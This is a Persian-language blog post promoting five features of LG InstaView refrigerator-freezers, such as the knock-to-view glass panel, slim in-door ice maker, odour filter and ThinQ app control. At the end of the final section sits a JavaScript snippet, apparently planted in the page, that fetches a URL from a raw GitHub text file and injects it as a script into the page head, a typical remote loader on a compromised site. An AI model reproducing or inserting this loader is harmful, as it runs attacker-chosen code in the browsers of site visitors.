دسته‌بندی نشده

5 ویژگی برتر یخچال فریزر های اینستا ویو ال جی

اولین موردی که هنگام خرید یک یخچال فریزر به ذهن افراد می رسد مدل های بسیار زیاد ان و سختی انتخاب در بین ان ها می باشد. حتی اگر تصمیم بر خرید یک نوع خاص از یخچال فریزر ها مانند درب فرانسویی دارید باز انتخاب ها فوق العاده گسترده می باشند و تصمیم گیری بسیار سخت است. در اخر تصمیم بر انتخاب یک یخچال فریزر بستگی به نیاز روزانه افراد, جمعیت خانواده و سلیقه ان ها دارد.
کمپانی ال جی در سال های اخیر تولیداتی با عنوان اینستا ویو instaview را عرضه کرده است. این محصولا از ویژگی های فوق العاده بر خوردار هستند و دارای طراحی خاص و ویژه می باشد. در ادامه این مطلب به بررسی 5 ویژگی برتر این یخچال فریزر را می پردازیم که این محصولات را در میان دیگر مدل ها بسیار خاص و فوق العاده کرده است.

1. فضای داخلی بدون نیاز به باز شدن درب قابل مشاهده است

باز کردن درب یخچال فریزر به صورت مکرر و دائمی در طول روز باعث هدر رفتن انرژی زیاد و هوا سرد داخل ان می شود. به این صورت که با باز ماندن درب هوا سرد از ان خارج می شود بنابراین یخچال فریزر نیاز دارد تا با قدرت بیشتری برای خنک ماندن کار کند بنابراین انرژی بیشتری را مصرف می کند.
قابلیت  InstaView Door-in-Door در یخچال فریزر ال جی این مشکل را به صورت کامل از بین می برد. در این قابلیت یک پنل شیشه ای بر روی قسمت بالایی محصول استفاده شده است که در نگاه اول چندان به چشم نمی اید اما بعد از دو ضربه بر روی ان محتویات و خوراکی ها داخل یخچال بدون هدر رفتن هوا خنک قابل مشاهده است.
در این قابلیت می توان خوراکی هایی را بیشتر از ان ها استفاده می کنید را در قسمت دور این دور قرار دهید. با این روش دسترسی به اقلام بسیار اسان تر می باشد و در عین حال یخچال فریزر انرژی بسیار کمتری را مصرف می کند. 

2. سیستم ذخیره سازی هوشمند 

اگر می خواهید یخچال فریزری را تهیه کنید که بتوانید تمامی اقلام روزانه و خوراکی ها مختلف را  داخل ان بدون مشکل جا دهید سیستم ذخیره سازی هوشمند موجود در یخچال فریزر های اینستا ویوو بسیار کاربردی است. در بیشتر مدل های این یخچال فریزر ها یخساز با تکنولوژی SpacePlus™ تعبیه می شود. در این ویژگی یخساز به صورت کاملا باریک و توکار داخل درب ساخته می شود و هرچگونه فضای داخلی را اشغال نمی کند بنابراین افراد قفسه های بیشتر را برای ذخیره سازی در اختیار خواهند داشت. در این محصولات می توان به اسانی انواع اقلام مختلف را در اندازه های بزرگ و کوچک و بطری های بلند را به اسانی ذخیره سازی کرد و همچنین با ذخیره سازی هوشمند و یا سازمان دهی شده که برای ان ها تعبیه شده است می توان به تمامی اقلام داخلی دسترسی اسان داشت. 

3. فضای داخلی سالم و جریان هوا پاکیزه

بد ترین اتفاقی که موقع باز کردن درب یخچال فریزر ممکن است رخ دهد پخش بوی ناخوشایند ناشی از ترکیب شدن بو مواد غذایی با یکدیگر می باشد. استفاده از فیلتر های ضد بو مانند Pure N Fresh air در این محصولات LG مشکل ترکیب شدن بو و ایجاد بو ناخوشایند داخل یخچال را به طور کلی از بین می برد. 

4. کنترل هوشمند

کنترل هوشمند قابلیتی است که امروزی در بیشتر یخچال فریزر ها از برند های مختلف وجود دارد. در یخچال فریزر های ایسنتا ویو نیز این قابلیت با استفاده از اپلیکیشن ThinQ کار می کند. در این ویژگی با استفاده از گوشی های هوشمند کاربران می توانند به اسانی از راه دور تنظیمات مختلفی مانند تنظیم دما و … را انجام داد. در این قابلیت همچنین با فعال شدن یک الارم باز بودن درب به افراد اخطار داده می شود. این ویژگی در صرفه جویی در انرژی بسیار کاربردی است. 

5. ظاهر زیبا 

یخچال فریزر های دور این دور اینستا ویو علاوه بر ویژگی های کاربردی بسیار زیبا و چشمگیر هستند. این محصولات جلوه ای زیبا و درخشان دارند و فوق العاده شیک می باشند. طراحی دور این دور در این یخچال فریزر ها با چهار درب ارائه می شوند. به این صورت که دو درب در قسمت بالا برای یخچال و دو درب در پایین برای فریزر تعبیه می شود. یخچال فریزر های اینستا ویو را همچنین به صورت ساید بای ساید ارائه می دهند .  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *